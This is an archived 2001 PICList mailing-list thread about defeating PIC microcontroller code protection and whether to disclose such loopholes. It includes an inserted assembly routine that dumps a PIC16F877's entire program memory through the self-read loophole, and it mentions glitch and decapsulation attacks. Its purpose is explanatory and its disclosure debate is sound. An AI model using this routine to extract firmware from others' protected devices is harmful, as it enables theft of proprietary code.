PICList Thread
'[PIC]: Read this for your own good'
2001\11\03@054912 by Peter L. Peres

I just stumbled across a method to read out PIC code in any PIC that uses
the XNOR/XOR scrambled readback method when the PIC is protected. It is
here:

http://www.net.yu/~dejan/

I know that more recent PICs read out as zeros when protected. I hope that
you out there who rely on PIC data protection know this.

Peter

PS: Apologies if you already know this.

--
http://www.piclist.com hint: PICList Posts must start with ONE topic:
[PIC]:,[SX]:,[AVR]: ->uP ONLY! [EE]:,[OT]: ->Other [BUY]:,[AD]: ->Ads


2001\11\03@060409 by James Caska

picon face
Is nothing safe!

...We all know how to hack protected F877s, right?

James Caska
caska@virtualbreadboard.com



2001\11\04@033029 by Philip Pemberton

James Caska said:
> Is nothing safe!
>
> ..We all know how to to hack protected F877's right?
I don't - what's the secret? A diode? A clock glitch? A Vcc glitch?

Later.
--
Phil.
philpem@bigfoot.com
http://www.philpem.f9.co.uk/



2001\11\04@035016 by James Caska

Philip Pemberton wrote,

>I don't - what's the secret? A diode? A clock glitch? A Vcc glitch?

I don't actually believe in hacking; I was just curious to see if the 877
hack is public knowledge. I don't know if making public a hack is a good
idea or not. Thoughts?

Regards,
James Caska
caska@virtualbreadboard.com http://www.virtualbreadboard.com
ujVM - 'The world's smallest Java virtual machine'


2001\11\04@054320 by Gerhard Fiedler
At 19:51 11/04/2001 +1100, James Caska wrote:
>I don't actually believe in hacking, I was just curious to see if the 877
>hack is public knowledge. I don't know if making public a hack is a good
>idea or not? Thoughts..?

I'm not sure, but I would tend to say that publishing it is the better of
the two. Then people can make a better informed choice on whether to rely
on the protection or not, or when and how to rely on it, or what to do to
prevent the hack. And the manufacturer has a better chance to fix it.

Of course, if you want to exploit the hack, you'd better not publish it...
After all, it's one of your business assets  :)

ge



2001\11\04@061218 by James Caska

Gerhard Fiedler wrote;
>I'm not sure, but I would tend to say that publishing it is the better of
>the two. Then people can make a better informed choice on whether to rely
>on the protection or not, or when and how to rely on it, or what to do to
>prevent the hack. And the manufacturer has a better chance to fix it.

I tend to agree that public knowledge (as with encryption algorithms) is
best. In truth it is not a "pure hack", more a special-condition loophole in
the segmented protection whereby, if the device is not fully protected, the
877's ability to read its own memory can be used to export the whole of the
memory. Segmenting is better handled by the PIC18FXX2. I came across it when
considering how to protect the ujVM877 when it downloads new class files
(native compiled) and had to abandon having firmware on-chip because of the
loophole.

What's a ujVM877? Well, that's another story that is going to take a while to
tell, but essentially: ever wondered if a PIC could execute PURE Java, i.e.
Java compiled by javac? The answer is yes.

Regards,
James Caska
caska@virtualbreadboard.com http://www.virtualbreadboard.com
ujVM - 'The world's smallest Java virtual machine'


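The loophole James describes above, as an added example that is not from the original thread: the program-memory self-read sequence the PIC16F87x datasheet documents (EEPGD and RD in EECON1, address in EEADRH:EEADR, result in EEDATH:EEDATA), wrapped in a loop that walks all 8K words of a 16F877 and hands each byte to an output routine. `send_byte` is assumed to exist (a transmit routine that takes the byte in W) and is not defined here; the address and data temporaries live in the shared RAM at 0x70 so they are visible from every bank. Whether words in a protected segment come back as real data when this runs from an unprotected segment is the post's claim, not something the code checks.

```asm
; Added example, not code from the original thread.
; PIC16F877 program-memory self-read, looped over the whole 8K-word space.
; send_byte is assumed to exist elsewhere (byte in W); it is not defined here.
        list    p=16f877
        #include <p16f877.inc>

        cblock  0x70                ; shared RAM: same address in all four banks
            addr_lo
            addr_hi
            data_lo
            data_hi
        endc

        org     0x0000
        goto    start

; rd_pm: read the 14-bit word at EEADRH:EEADR into EEDATH:EEDATA.
; Caller must already have loaded EEADRH:EEADR (bank 2). Returns in bank 2.
rd_pm
        bsf     STATUS, RP1
        bsf     STATUS, RP0         ; bank 3 holds EECON1
        bsf     EECON1, EEPGD       ; target program memory, not data EEPROM
        bsf     EECON1, RD          ; start the read
        nop                         ; the datasheet requires two cycles here:
        nop                         ; the word is fetched during these nops
        bcf     STATUS, RP0         ; bank 2: EEDATA/EEDATH now hold the word
        return

start
        clrf    addr_lo
        clrf    addr_hi
dump_loop
        bsf     STATUS, RP1
        bcf     STATUS, RP0         ; bank 2 holds EEADR/EEADRH/EEDATA/EEDATH
        movf    addr_lo, W
        movwf   EEADR
        movf    addr_hi, W
        movwf   EEADRH
        call    rd_pm
        movf    EEDATH, W           ; copy out before send_byte can switch banks
        movwf   data_hi
        movf    EEDATA, W
        movwf   data_lo
        movf    data_hi, W
        call    send_byte           ; upper 6 bits of the word
        movf    data_lo, W
        call    send_byte           ; lower 8 bits of the word
        incf    addr_lo, F
        btfsc   STATUS, Z           ; low byte wrapped?
        incf    addr_hi, F
        btfss   addr_hi, 5          ; bit 5 set means address reached 0x2000
        goto    dump_loop
        goto    $                   ; done: 8K words sent
        end
```

The point of the example is not the read itself, which is ordinary datasheet behaviour, but that nothing in the sequence cares which protection segment the target address falls in: any code the attacker can get running on the part (here, in an unprotected segment) can issue it for every address. That is why James concludes that only fully protecting the device, or moving to a part with proper segment isolation, closes the gap.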

2001\11\04@141546 by Spehro Pefhany

At 10:13 PM 11/4/01 +1100, you wrote:
>
>I tend to agree that public knowledge (as with encryption algorithms) is
>best. In truth it is not a "pure hack" more a special condition loophole in
>the segmented protection whereby if the device is not fully protected the
>877's ability to read its own memory can be used to export the whole of the
>memory. Segmenting is better handled by the PIC18FXX2. I came across it when
>considering how to protect the ujVM877 when it downloads new class files
>(native compiled) and had to abandon having firmware onchip because of the
>loophole.

I understand the PIC "F" series, though better than previous attempts, still
have some vulnerability to Vdd glitch attacks as well as simple invasive
attack (decapsulation and microprobing).

My thought is that you tell Microchip first, wait "n" months where 2 < n < 6,
and then tell the public, and tell whatever individuals you like in the meantime.

Best regards,

Spehro Pefhany --"it's the network..."            "The Journey is the reward"
speff@interlog.com                             Info for manufacturers: http://www.trexon.com
Embedded software/hardware/analog  Info for designers:  http://www.speff.com
     /.-.\
    (( * ))
     \\ //     Please help if you can:
      \\\      dailynews.yahoo.com/fc/US/Emergency_Information/
     //\\\
    /// \\\
    \/   \/



2001\11\05@164906 by Peter L. Peres

> to tell or not to tell

I agree with Spehro but I believe that I was right to let it go, because
it seems to be old news, and because it popped up in a web search for
something else related to PICs. Makes you really wonder how many times it
popped up for others, and they did not tell, doesn't it?

I remember that we used to be able to protect EPROMs permanently by
blasting the Vpp pad contact with a 1A reverse current (vs. gnd) in 2708
and 2716 EPROM clones. This was necessary because someone was in the
business of making them disappear and reappear on the black market (this
was not in this country).

Maybe the PIC could have a weak internal pullup on MCLR (like the 12C5xx
have for sure) and an extra beefy MCLR reverse diode to GND so the pad
wire could be burned permanently with a reverse current pulse. Then maybe
this is extreme ;-).

Peter



2001\11\06@202444 by Jinx

> I just stumbled across a method to read out PIC code in any PIC
> that uses the XNOR/XOR scrambled readback method when the
> PIC is protected. It is here:
>
> http://www.net.yu/~dejan/

And I stumbled across this one today. Common PICs are in the list
of those broken into using power glitches

http://www.cl.cam.ac.uk/~sps32/mcu_lock.html


